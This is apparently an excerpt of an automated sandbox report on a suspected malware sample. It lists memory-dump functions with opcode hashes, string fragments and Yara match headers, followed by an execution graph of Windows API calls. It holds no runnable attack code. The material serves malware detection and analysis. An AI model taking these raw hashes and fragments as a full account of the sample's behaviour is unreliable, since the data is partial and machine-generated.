              • Opcode ID: c804ea0c90ad0f8f8b7c43f5fd3a32a5b38acce3b9bc0a66e838552e6702c463
              • Instruction ID: 7d676bb30e78aa7c3e1cb5fc6025517c7af0d75a58885988a151dc4fff196af6
              • Opcode Fuzzy Hash: c804ea0c90ad0f8f8b7c43f5fd3a32a5b38acce3b9bc0a66e838552e6702c463
              • Instruction Fuzzy Hash: 328118B6D002699FDB21CF54CC44BDAB6B8BF49750F0041EAAA1DB7250E7309E858FA1
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $($*G$+G$+`*G$2'$6#$?;$A$E $F$J$NC$WD$Y$Y$al$eX$kt$l#$n?$nG$xx$z*$}$[${
              • API String ID: 0-4268252
              • Opcode ID: b1e7b512ca35f87c4249620423eccb3fefbed78162afbc3ba92de6990dbe2db2
              • Instruction ID: 89c06bc58c333611cdeae778d8e21bbf95f178f8c5644927a6e7509083114af0
              • Opcode Fuzzy Hash: b1e7b512ca35f87c4249620423eccb3fefbed78162afbc3ba92de6990dbe2db2
              • Instruction Fuzzy Hash: 3612F0B0D05268CBEB24CF55C894BECBBB1BB44309F1481DAE54D6B381C7B85A89CF65
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 6$O$S$\$dC)-$s
              • API String ID: 0-1759645026
              • Opcode ID: 9a43a8b9a58488950e81553bd57fdaec392b5599634c3aced6f8ec91e164c139
              • Instruction ID: b8dcd72561b155d93961e408f218f05c00917884646adfa25266cf15421857e5
              • Opcode Fuzzy Hash: 9a43a8b9a58488950e81553bd57fdaec392b5599634c3aced6f8ec91e164c139
              • Instruction Fuzzy Hash: 755183B2D00218ABDB14DF94DDC9EEFB3B8EF54310F04419EE909AB240E7759A558BA1
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 69
              • API String ID: 0-2545945474
              • Opcode ID: 3b8c53bed5436308056c6d5947c35c9c72433cb1c2ef30e4e394c98c38ee9044
              • Instruction ID: 80dc0177317d2ba0319b2ceb5e225a605eae454c8bdb8c9b57a3af595a893ee9
              • Opcode Fuzzy Hash: 3b8c53bed5436308056c6d5947c35c9c72433cb1c2ef30e4e394c98c38ee9044
              • Instruction Fuzzy Hash: 9B01E9B6D01218AFCB50DFE8C940AEEBBF8EB58600F14466EE909F7200F77456058BA1
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: dC)-
              • API String ID: 0-3863301967
              • Opcode ID: d92dcfb3e39c16d3db53120886c28eb88e45c39c938887025e90682cf3b08812
              • Instruction ID: 9807a0a054b477863289af35864d4f100c0ee84c43c6a63fcc3eee377368a8c5
              • Opcode Fuzzy Hash: d92dcfb3e39c16d3db53120886c28eb88e45c39c938887025e90682cf3b08812
              • Instruction Fuzzy Hash: D6F09C659003187FDB20FB60DCC5DEFB37CEB44710F04419AE90C6A280E77459C58755
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$@@@>$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
              • API String ID: 0-2725001343
              • Opcode ID: 724d2bb97aa10951969aae5822f5096e726706ad30f2175da36a163168f6a79f
              • Instruction ID: b130568dd2f44a92731ed4ddce44a2c4a867ef970ee6c3e314fef8eda704daf1
              • Opcode Fuzzy Hash: 724d2bb97aa10951969aae5822f5096e726706ad30f2175da36a163168f6a79f
              • Instruction Fuzzy Hash: 22910FF08052A98ACB118F55A5603DFBF71BB95204F1581E9C6AA7B203C3BE4E85DF90
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
              • API String ID: 0-1002149817
              • Opcode ID: ef69595ee954a19a6b4a112c50e30cfc7f8dd93bfbf5f75a974b666e114f6579
              • Instruction ID: d5f2f329b94b78ff89aea25e373eac62d5d7c01997cdd5a21eabc6a3a6316052
              • Opcode Fuzzy Hash: ef69595ee954a19a6b4a112c50e30cfc7f8dd93bfbf5f75a974b666e114f6579
              • Instruction Fuzzy Hash: 76C140B5D003689EDB60DFA4CD44BEEBBB8AF45304F0081DAD548AB241E7B55A88CF95
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $($*G$+G$+`$2'$6#$?;$A$E $F$J$NC$WD$Y$Y$al$eX$kt$n?$nG$xx$}$[${
              • API String ID: 0-1346699954
              • Opcode ID: 5157ba8938cebdce6db70c6c928799886f94bb22bcecdc4286f2c13f99fbeeb8
              • Instruction ID: a2bed0b45427bab380b5a056b52ce04bc0139aaf90f360776a4f38407509224a
              • Opcode Fuzzy Hash: 5157ba8938cebdce6db70c6c928799886f94bb22bcecdc4286f2c13f99fbeeb8
              • Instruction Fuzzy Hash: 48614AB0C05668CBEB60CF81C9997DDBBB1BB45308F108199D55C3B391CBBA1A89CF95
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $($*G$+G$+`$2'$6#$?;$A$E $F$J$NC$WD$Y$Y$al$eX$kt$n?$nG$xx$}$[${
              • API String ID: 0-1346699954
              • Opcode ID: 967802b4280391916bd5077911e49f833c879f5af1973ff22fce8650028ef3b0
              • Instruction ID: e4faa59129ebfad699b4174100af5ddd6b47fbecce14011692d8833deab78720
              • Opcode Fuzzy Hash: 967802b4280391916bd5077911e49f833c879f5af1973ff22fce8650028ef3b0
              • Instruction Fuzzy Hash: A9614AB0C05668CBEB60CF81C9997DDBBB1BB45308F108199D55C3B291CBB91A89CF95
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
              • API String ID: 0-3236418099
              • Opcode ID: 9de624e6471d0f271127cb383cee21be1e836046f5a13c27a21d7adaf809aba7
              • Instruction ID: 9bc8d3203b0241d7a03d2bb8ea8b090a23399b0c02597d20eb5ef697eb195a8a
              • Opcode Fuzzy Hash: 9de624e6471d0f271127cb383cee21be1e836046f5a13c27a21d7adaf809aba7
              • Instruction Fuzzy Hash: 5E9153B5901318AEEB20DF94DD84FEEB7BDEF45304F4041AAE50CAA240E7755B898F61
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
              • API String ID: 0-392141074
              • Opcode ID: 87927341c713c1065d19cd3be5948563df79707ad85515d44f29b4e459e27890
              • Instruction ID: 376374064ec031c974a66ad89feb8c19f6fa98049db23786c06fa2f692e5f293
              • Opcode Fuzzy Hash: 87927341c713c1065d19cd3be5948563df79707ad85515d44f29b4e459e27890
              • Instruction Fuzzy Hash: B07103B5D00318AADB55DF94CD80FDEB77DBF08700F00869AE519AA240EB755B88CF55
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
              • API String ID: 0-392141074
              • Opcode ID: dcb9bf16f8add72ea8bac095ff8794cc36ad2814b68ee1587e0251dece639bc6
              • Instruction ID: 048bec214c549b25a8b6d67996dff2ad8c24683d66f92a27cbe7a73059acc8bb
              • Opcode Fuzzy Hash: dcb9bf16f8add72ea8bac095ff8794cc36ad2814b68ee1587e0251dece639bc6
              • Instruction Fuzzy Hash: 386111B5D00318AADB65DFA4CD80FDEB77DBF08700F00869AE519AA240EB755788CF65
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: :$:$:$A$I$N$P$m$s$t
              • API String ID: 0-2304485323
              • Opcode ID: feaf2d17cfa662352deee3695314e5294a9a7057e5ef61339f16b3c38109adea
              • Instruction ID: ffc084d9f5d982d1a606b48c1721bed49966a51ed781f87aea63756252caff18
              • Opcode Fuzzy Hash: feaf2d17cfa662352deee3695314e5294a9a7057e5ef61339f16b3c38109adea
              • Instruction Fuzzy Hash: 7FD109B5910304ABDB50DFB4CD84FEEB7F9FF58350F04451AE14AAB240EB79A6058BA4
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: :$:$:$A$I$N$P$m$s$t
              • API String ID: 0-2304485323
              • Opcode ID: 900b3094e341506886da5d5f1d7075a913c6a4c627ef1f09a5cdd8d4c3dc3097
              • Instruction ID: 65677d4e0e0e01e61e8902c8b41a1d29a1023df6248669155e9f37588cb815be
              • Opcode Fuzzy Hash: 900b3094e341506886da5d5f1d7075a913c6a4c627ef1f09a5cdd8d4c3dc3097
              • Instruction Fuzzy Hash: 0481F7B5910308ABDB50DFB4CD84BEEB7F9FF58350F04451AE149AB240EB79A6058BA4
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: -$/$F$J$L$M$Y$k$u$y
              • API String ID: 0-3213266539
              • Opcode ID: 0802501601948fbe9fdc910101d99a0d706e9272abae7dba0ab8098aface9820
              • Instruction ID: 0ac6abc6ae68cb0a9c391c0e1910e7bb4e1f635cd2066de0c355545ea0ae31a2
              • Opcode Fuzzy Hash: 0802501601948fbe9fdc910101d99a0d706e9272abae7dba0ab8098aface9820
              • Instruction Fuzzy Hash: BF11DB50D087CEDEDB12C7BD84087AEBFB15F23218F0882D9D9A42B2D2D2794645C7A6
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: .$P$e$i$m$o$r$x
              • API String ID: 0-620024284
              • Opcode ID: e86df46174dd781897815fccbad4a2e85b1aaec8b0725fdcf39d91c8dfb329ef
              • Instruction ID: cb44eafbe447ac3ebbe7f79f41f5f0319058f441c176d3ccf967942eff1053f1
              • Opcode Fuzzy Hash: e86df46174dd781897815fccbad4a2e85b1aaec8b0725fdcf39d91c8dfb329ef
              • Instruction Fuzzy Hash: DE41A8B5C00318B7DB14EFA0CD85FDE777CAF55310F00859AA50EAB240EAB597498FA1
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: L$S$\$a$c$e$l
              • API String ID: 0-3322591375
              • Opcode ID: 41e95db4a7be2744076f6a07a63dd681ee74051bd6ffc224a013dbda048ac28c
              • Instruction ID: 87695aec50be8a804e8b98ccdcee0f697e60ad2bffaa704d556d6082351fd8fe
              • Opcode Fuzzy Hash: 41e95db4a7be2744076f6a07a63dd681ee74051bd6ffc224a013dbda048ac28c
              • Instruction Fuzzy Hash: 324130B6C04318AADF14EFA9DCC4BEEB7B8BF48310F05456AD909AB200E7755A458B94
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: F$P$T$f$r$x
              • API String ID: 0-2523166886
              • Opcode ID: edf26e3e9968275072e249de2c8ba3e6306a0f21a5428a58616b7591200b67bc
              • Instruction ID: acac46a1c91374b9a64f07c8d42d27bb7a35cf41b1503fc74f96c3989e83dafc
              • Opcode Fuzzy Hash: edf26e3e9968275072e249de2c8ba3e6306a0f21a5428a58616b7591200b67bc
              • Instruction Fuzzy Hash: C5519471900304EEDB34EFA5CDC4BEEF7B8AF05310F04465EE5499A281E7B5A684CBA1
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $i$l$o$u
              • API String ID: 0-2051669658
              • Opcode ID: 6558f4648b4866e4c04735c8e846373b67ad3277b6ec47656e4563e3a70686f9
              • Instruction ID: 3a20458123b5edada2cf63f0ef8ffacbc231a576da877dc3dc545065fe8fb0b0
              • Opcode Fuzzy Hash: 6558f4648b4866e4c04735c8e846373b67ad3277b6ec47656e4563e3a70686f9
              • Instruction Fuzzy Hash: A36128B6A00304AFDB24DBA5CC84FEFB7BCEB88710F14455EE559E7240E775AA418B60
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $i$l$o$u
              • API String ID: 0-2051669658
              • Opcode ID: ad7d5b721cfab377131ce7a5bda7b50c1de86136e2e568d45a55074eefb510da
              • Instruction ID: c558e2682a8c5a095b1ca88c5294ae31ab7405f428a7feccb2220e82106d7c70
              • Opcode Fuzzy Hash: ad7d5b721cfab377131ce7a5bda7b50c1de86136e2e568d45a55074eefb510da
              • Instruction Fuzzy Hash: ED4108B5A00318AFDB20DFA5CC84FEEBBBDEB88700F10455EE559A7240D775AA45CB60
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$k$o
              • API String ID: 0-3624523832
              • Opcode ID: 22e79b6a2b1ec1c49f4cfd5d6553d5df89cebea1ed55f0b4db09508f357302d9
              • Instruction ID: 9c1122b48f19638c52f701ef8c7a0d5d3bc67edde6d674ded705ee530ba13408
              • Opcode Fuzzy Hash: 22e79b6a2b1ec1c49f4cfd5d6553d5df89cebea1ed55f0b4db09508f357302d9
              • Instruction Fuzzy Hash: 1DB11CB5A00708AFDB24DBA5CC84FEFB7FDAF88700F14855DF61997240D675AA418BA0
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$h$o
              • API String ID: 0-3662636641
              • Opcode ID: 331b19d6338596541a3455233badb27fb991ae04d9ef4023f25f1bb5a770352a
              • Instruction ID: 0fa5ca91e377734c9787bce288596833b35b8b28dea838d96a5a3ec6bd515aed
              • Opcode Fuzzy Hash: 331b19d6338596541a3455233badb27fb991ae04d9ef4023f25f1bb5a770352a
              • Instruction Fuzzy Hash: A48152B6801219AEDB15EB90CD84FEEB37CEF59300F40859BA50ABA140EA755B45CFA1
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$k$o
              • API String ID: 0-3624523832
              • Opcode ID: b1bedfb7787c59eeb9b9b842714c40c277f3a1f7b43d35b26c68d714804dff8d
              • Instruction ID: 48d9d9d55449831602b56754fa1295ab994f997eb92fd591fd9e3b8ca803b5ea
              • Opcode Fuzzy Hash: b1bedfb7787c59eeb9b9b842714c40c277f3a1f7b43d35b26c68d714804dff8d
              • Instruction Fuzzy Hash: 52614CB5A00308AFDB54DFA4CC84FEFB7BDAF88700F108559E6599B240D771AA41CB60
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$k$o
              • API String ID: 0-3624523832
              • Opcode ID: 01ca271baa759b1a8dcef4148615210a482e1a5a439062a0fd6d38fe25388acf
              • Instruction ID: ead08073243afc1e68270f905ba97888bf70aebea75ed6d57bee8c538bef0fa7
              • Opcode Fuzzy Hash: 01ca271baa759b1a8dcef4148615210a482e1a5a439062a0fd6d38fe25388acf
              • Instruction Fuzzy Hash: 1541C6B6C00318ABDB14DFA4DD85EEEB7BCAF14300F04455EE909AB200E775A644CBB0
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
              • API String ID: 0-2877786613
              • Opcode ID: af5f89181a0387ea85883fd49ebfd70d93337d324e365111594b18440835d76c
              • Instruction ID: 2946a96efcbc0e9b24c2211363ad22f6a6e2f701c5459bff62ee47b15f503f23
              • Opcode Fuzzy Hash: af5f89181a0387ea85883fd49ebfd70d93337d324e365111594b18440835d76c
              • Instruction Fuzzy Hash: 13416E759112187AEB21EB90CD82FFFB77DAF55720F04604AF5047A280EB785A05C7AA
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
              • API String ID: 0-2877786613
              • Opcode ID: c5fbbdbb79a8cf63ab5860b693cf2c0ac774953bdbfdb4a167fc83ee9b0ce16a
              • Instruction ID: 2ef0befa8767ec1b069895c78e64f8fa31ec59b8b64efc65bdb1fc04bf7d54ea
              • Opcode Fuzzy Hash: c5fbbdbb79a8cf63ab5860b693cf2c0ac774953bdbfdb4a167fc83ee9b0ce16a
              • Instruction Fuzzy Hash: 773153759112187AE711EB90CD82FEFB77DEF55720F00504AF9047A280EB786B0187BA
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$h$o
              • API String ID: 0-3662636641
              • Opcode ID: f96b5d1fd9eaaadb90794e06692c88131eff1967be1f33c9a9ea66342f454b35
              • Instruction ID: d7c3f637250f4f4999d7576689fc054bed797ae349488fda2f16f55435168aee
              • Opcode Fuzzy Hash: f96b5d1fd9eaaadb90794e06692c88131eff1967be1f33c9a9ea66342f454b35
              • Instruction Fuzzy Hash: 35417375C00329AEDB11EBA0CD84FDEB3B9EF49300F40859BA509BA240EB755B44CFA5
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 1$3$6$a
              • API String ID: 0-758113741
              • Opcode ID: 602e8d98a1431258267bf7df073729f584c7ac042b68216748718e2079307e10
              • Instruction ID: 0ae4c24e808468e96c3de125556f61523f46d9128a0a89cc49a9059f4f934233
              • Opcode Fuzzy Hash: 602e8d98a1431258267bf7df073729f584c7ac042b68216748718e2079307e10
              • Instruction Fuzzy Hash: 983146B5A10219BBEB04DF94CD41BFEB7B8EF45304F00415AE904AB340E7769B448BE5
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$k$o
              • API String ID: 0-3624523832
              • Opcode ID: 7805f3b636fc97e65af30f258e78b0cfafbe0a828249a0b29b015f67bd7c5691
              • Instruction ID: a4bcae6421989d7da3a6dd0dcd54dc40b95f0d05209ab4e317859f311a9ccde9
              • Opcode Fuzzy Hash: 7805f3b636fc97e65af30f258e78b0cfafbe0a828249a0b29b015f67bd7c5691
              • Instruction Fuzzy Hash: FD0161B2900218ABDB14DF98DCC4ADEF7B9FF08714F04825AE9196B205E771D545CBA0

              Execution Graph

              Execution Coverage:3.2%
              Dynamic/Decrypted Code Coverage:3.4%
              Signature Coverage:1.7%
              Total number of Nodes:584
              Total number of Limit Nodes:86
84342 3a9fb4 84342->84293 84343->84342 84364 3a9c70 84343->84364 84344->84342 84345 3a9c70 RtlFreeHeap 84344->84345 84345->84344 84348 3aa146 84347->84348 84349 3b5180 2 API calls 84348->84349 84350 3aa1c2 84349->84350 84351 3ad7e0 3 API calls 84350->84351 84352 3aa1cd 84351->84352 84352->84296 84353->84322 84355 3b5180 2 API calls 84354->84355 84356 3ad804 84355->84356 84357 3ad811 84356->84357 84358 3b5180 2 API calls 84356->84358 84357->84341 84359 3ad828 84358->84359 84359->84357 84360 3b5180 2 API calls 84359->84360 84361 3ad847 84360->84361 84362 3bb180 RtlFreeHeap 84361->84362 84363 3ad854 84362->84363 84363->84341 84365 3a9c8d 84364->84365 84368 3ad870 84365->84368 84367 3a9d93 84367->84343 84369 3ad894 84368->84369 84370 3ad93e 84369->84370 84371 3bb180 RtlFreeHeap 84369->84371 84370->84367 84371->84370 84372 3a69d0 84373 3a69fa 84372->84373 84376 3a7bb0 84373->84376 84375 3a6a24 84377 3a7bcd 84376->84377 84383 3b8790 84377->84383 84379 3a7c1d 84380 3a7c24 84379->84380 84381 3b8870 LdrInitializeThunk 84379->84381 84380->84375 84382 3a7c4d 84381->84382 84382->84375 84384 3b882e 84383->84384 84385 3b87be 84383->84385 84388 2e42f30 LdrInitializeThunk 84384->84388 84385->84379 84386 3b8867 84386->84379 84388->84386 84389 3a7051 84390 3a7058 84389->84390 84391 3a6ff1 84389->84391 84392 3aaf00 9 API calls 84391->84392 84393 3a7002 84391->84393 84392->84393 84394 3b8650 84395 3b866d 84394->84395 84398 2e42df0 LdrInitializeThunk 84395->84398 84396 3b8695 84398->84396 84399 3b84d0 84400 3b8562 84399->84400 84402 3b84fe 84399->84402 84404 2e42ee0 LdrInitializeThunk 84400->84404 84401 3b8593 84404->84401 84405 3b5d50 84406 3b5daa 84405->84406 84408 3b5db7 84406->84408 84409 3b3760 84406->84409 84410 3bb0f0 NtAllocateVirtualMemory 84409->84410 84412 3b37a1 84410->84412 84411 3b38ae 84411->84408 84412->84411 84413 3a4180 LdrLoadDll 84412->84413 84415 3b37e7 84413->84415 84414 3b3830 Sleep 84414->84415 84415->84411 84415->84414 84416 3b8d50 84417 3b8e0a 84416->84417 
84419 3b8d82 84416->84419 84418 3b8e20 NtCreateFile 84417->84418 84420 3b1790 84421 3b17a9 84420->84421 84422 3b5180 2 API calls 84421->84422 84426 3b17c6 84422->84426 84423 3b183c 84424 3b17f4 84425 3bb180 RtlFreeHeap 84424->84425 84427 3b1804 84425->84427 84426->84423 84426->84424 84428 3b1837 84426->84428 84429 3bb180 RtlFreeHeap 84428->84429 84429->84423 84430 2e42ad0 LdrInitializeThunk 84431 399b00 84433 399e84 84431->84433 84434 39a2d2 84433->84434 84435 3bade0 84433->84435 84436 3bae06 84435->84436 84441 3940e0 84436->84441 84438 3bae12 84439 3bae4b 84438->84439 84444 3b52e0 84438->84444 84439->84434 84448 3a2e40 84441->84448 84443 3940ed 84443->84438 84445 3b5342 84444->84445 84447 3b534f 84445->84447 84461 3a1630 84445->84461 84447->84439 84449 3a2e5d 84448->84449 84451 3a2e76 84449->84451 84452 3b9af0 84449->84452 84451->84443 84453 3b9b0a 84452->84453 84454 3b5180 2 API calls 84453->84454 84456 3b9b30 84454->84456 84455 3b9b39 84455->84451 84456->84455 84457 3b86a0 LdrInitializeThunk 84456->84457 84458 3b9b99 84457->84458 84459 3bb180 RtlFreeHeap 84458->84459 84460 3b9bb2 84459->84460 84460->84451 84462 3a166b 84461->84462 84483 3a7b10 84462->84483 84464 3a1673 84465 3bb260 RtlAllocateHeap 84464->84465 84481 3a194d 84464->84481 84466 3a1689 84465->84466 84467 3bb260 RtlAllocateHeap 84466->84467 84468 3a169a 84467->84468 84469 3bb260 RtlAllocateHeap 84468->84469 84470 3a16a8 84469->84470 84494 3a5b80 84470->84494 84472 3a16b5 84473 3b5180 2 API calls 84472->84473 84476 3a16fb 84472->84476 84474 3a16e3 84473->84474 84475 3b5180 2 API calls 84474->84475 84475->84476 84482 3a1748 84476->84482 84500 3a6660 84476->84500 84478 3a4180 LdrLoadDll 84479 3a1902 84478->84479 84523 3b7c20 84479->84523 84481->84447 84482->84478 84484 3a7b3c 84483->84484 84485 3a7a00 2 API calls 84484->84485 84486 3a7b5f 84485->84486 84487 3a7b69 84486->84487 84488 3a7b81 84486->84488 84489 3a7b74 84487->84489 84491 3b9070 NtClose 84487->84491 84490 3a7b9d 84488->84490 84492 3b9070 
